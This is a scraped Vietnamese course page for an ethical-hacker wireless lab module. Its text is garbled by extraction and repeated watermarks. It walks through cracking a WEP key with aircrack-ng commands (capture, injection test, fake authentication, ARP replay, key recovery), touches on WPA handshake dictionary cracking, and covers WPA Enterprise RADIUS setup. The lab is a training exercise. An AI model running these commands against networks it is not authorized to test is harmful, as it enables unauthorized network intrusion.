Chuong 8 module wireless

46 127 0
Chuong 8 module wireless

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Athena Ethical Hacker Lab Wireless Module Crack Wep Key Crack WPA Key WPA Enterprise Bài: Crack WEP Key I Mục tiêu lab - Ta kiểm tra tính bảo mật wireless access point cấu hình theo chuẩn WEP - Mơ hình lab sau Attacker Wireless Access Point II Các bước thực - Phần cứng: hai card wireless broadcom chipset bcm43xx card linksys usb wireless card chipset rt73 - hệ điều hành Backtrack live usb hệ điều hành Linux install chương trình aircrack-ng Thao tác chuẩn bị - Cắm wireless usb vào laptop - Boot vào Back Track từ USB - Kiểm tra xem hệ điều hành nhận card wirelss Ta dùng lệnh lspci lsusb để kiểm tra Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân + Kiểm tra xem hệ điều hành nhận card wireless tên Cách làm sau, ta dùng lệnh ifconfig iwconfig để xem hệ điều hành nhận diện card Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân mạng Đối với card broadcom nhận eth0 eth1 Đối với usb wireless nhận rausb0 - Cấu hình card wireless capture inject Mình dùng card broadcom để inject card linksys để capture + Đối với card linksys usb ta cần phải làm số bước sau để load driver lên ifconfig rausb0 down modprobe -r rt73 modprobe rt73 Ta dùng card usb để capture - Ta thực trình capture sau Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân airmon-ng stop rausb0 airmon-ng start rausb0 airodump-ng rausb0 Lúc ta có MAC address Access Point (AP), channel mà hoạt động, dạng encryption mà sử dụng airodumg-ng -c [channel] -bssid [Mac_ap] -w [outputfile] rausb0 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Câu lệnh nhằm cấu hình card usb capture thông tin Access point mà ta muốn test Ok ta capture Ta mở lệnh cửa số konsole khác để tiếp tục trình Dùng card broadcom để inject - Đối với card broadcom ta cần kiểm tra xem inject hay chưa Giả sử AP hoạt động channel 3, SSID P.101 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân iwconfig eth0 ifconfig eth0 up iwconfig eth0 mode monitor channel aireplay-ng -9 -e XXX -a [Mac_ap] eth0 Injection working! Ta kiểm tra xem card wireless inject hay chưa Nếu báo Injection working ta làm - Lúc ta bắt đầu trình association với AP cách sử dụng kiểu attack fake authentication aireplay-ng -1 -e P.101 -a [Mac_ap] -h [Mac_broadcom_card] eth0 - Thực q trình inject dạng gói tin ARP request replay mode Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân aireplay -3 -x 300 -b [Mac-ap] -h [Mac_broadcom_card] eth0 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Ta đợi ta capture đủ số lượng packet cần thiết.Khoảng 40000 đến 80000 packet - Lúc ta thử crack xem ta có key hay chưa lệnh aircrack-ng -z -b [AP_mac] [out_put_file_name].cap Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ở ta kiểm tra xem protocol thuộc giao thức PEAP mà hỗ trợ Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta vào mục Server Certificate, để export certificate Ví dụ bên ta chọn xuất dạng Der File save Desktop Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta tạo Authentication Domain Để dễ dàng ta chọn Authenticate Using Elektron Accounts Nghĩa dùng username password tạo software để chứng thực Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta tạo user account hình bên Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Trên Server, ta thực trình import certificate vào server mục “Trust Certification” Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta import certificate vào vị trí Trusted Root Certificate Authority Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Click Yes để hồn thành trình Import Certificate vào 801.X Radius Server Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân - Tiếp tục ta xác định RADIUS Client Shared Key tương ứng cho Access Point o Ta tạo client có IP 192.168.100.254 o Shared Key 123abc!!! Cấu hình Wireless Access Point dùng WPA Enterprise Ta cấu hình Access Point dùng Security Mode WPA Enterprise, thuật toán WPA ta chọn AES Ta để port mặc định kết nối đến Radius Server 1812 Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Cấu hình máy Client Trên PC Client muốn kết nối đến Wireless Access Point, ta phải thực trình import certificate vào máy tính Certificate manual chép đến máy client Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Click Yes để hồn thành q trình Import certificate Ta thực trình kết nối đến Wireless Access Point 802.1X Radius Server trả cho client hình yêu cầu đăng nhập username password bên Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Ta nhập vào username password tương ứng mà ta tạo trên server Window đưa hình cảnh báo Và chọn Connect để hồn thành q trình kết nối Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân Đến ta hoàn thành ta kết nối đến Wireless Access Point có ESSID linksys hình bên Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân ... mật wireless access point cấu hình theo chuẩn WEP - Mơ hình lab sau Attacker Wireless Access Point II Các bước thực - Phần cứng: hai card wireless broadcom chipset bcm43xx card linksys usb wireless. .. certificate server Ta thực Lab cấu hình 80 2.1X RADIUS Server theo mơ sau: Tài Liệu Học Hacker Mũ Trắng-AEH Tại ATHENA.GV: Lê Đình Nhân 80 2.1X RADIUS SERVER CLIENT 192.1 68. 100.0/24 254 ACCESS POINT II... tính bảo mật wireless access point cấu hình theo chuẩn WPA - Mục tiêu lab capture way handshake sử dụng từ điển để crack Ta thực thông qua số bước sau - Mô hình lab sau Attacker Wireless Access

Ngày đăng: 20/11/2017, 09:17

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan